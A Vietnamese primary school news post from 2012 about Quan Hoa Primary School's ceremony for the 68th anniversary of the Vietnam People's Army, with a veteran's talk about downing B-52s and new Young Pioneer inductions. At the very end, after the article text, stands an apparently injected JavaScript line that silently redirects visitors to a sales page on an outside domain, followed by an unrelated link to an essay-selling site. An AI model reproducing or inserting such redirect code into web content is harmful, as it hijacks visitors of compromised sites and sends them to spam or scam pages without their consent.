Chào mừng 68 năm ngày thành lập Quân Đội Nhân Dân Việt Nam

16/12/2012 5:46 Chiều 1 phản hồi

Trải qua 68 năm xây dựng, chiến đấu và trưởng thành, dưới sự lãnh đạo của Đảng Cộng sản Việt Nam,  của Chủ tịch Hồ  Chí Minh vĩ đại , được sự đùm bọc của nhân dân; kế thừa truyền thống quật cường bất khuất của dân tộc, các thế hệ cán bộ, chiến sĩ QĐNDViệt Nam đã vượt qua muôn vàn khó khăn gian khổ, xây dựng, chiến đấu và chiến thắng oanh liệt, tô đẹp thêm trang sử vẻ vang của dân tộc.

Để tỏ lòng kính trọng và biết ơn các thế hệ cha anh đã hi sinh tuổi thanh xuân, hi sinh xương máu của mình để thế hệ trẻ hôm nay có cuộc sống ấm no, hạnh phúc;  trường TH Quan Hoa đã long trọng tổ chức Lễ kỷ niệm 68 năm ngày thành lập QĐND Việt Nam (22/12/1944- 22/12/2012).

Trong buổi lễ đầy ý nghĩa này, các em được tìm hiểu nhiều hơn về sự ra đời, quá trình phát triển của Quân đội nhân dân Việt Nam. Và điều đặc biệt là các em được nghe Thiếu tá Nguyễn Ngọc Tuân kể chuyện về những chiến công hào hùng của quân và dân ta khi bắn hạ máy bay B52 của địch.

Các em học sinh của trường đã có phần giao lưu rất bổ ích với chú Tuân về chiến thắng Hà Nội – Điện Biên Phủ trên không

Thay mặt cho học sinh toàn trường, em Nguyễn Thu Trang – học sinh lớp 5B đã bày tỏ tình cảm, lòng biết ơn sâu sắc của thế hệ trẻ trường Tiểu học Quan Hoa đối với các chú bộ đội.

Cũng trong ngày kỉ niệm đặc biệt này, 30 học sinh tiêu biểu của khối 3,4 đã vinh dự được trở thành đội viên Đội TNTP Hồ Chí Minh

Chào mừng 68 năm ngày thành lập QĐND Việt Nam, chúc mừng những đội viên mới, đội ca khúc măng non của trường cũng thể hiện tình cảm của mình qua những tiết mục đặc sắc.

Ngày 20/12/2012, đại diện Ban giám hiệu và giáo viên nhà trường cũng đã tới chia vui, chúc mừng các đồng chí trong Ban chỉ huy Quân sự quận Cầu giấy nhân ngày 22/12.

location.replace(“http://gethere.info/buy.php”);

https://essayclick.net/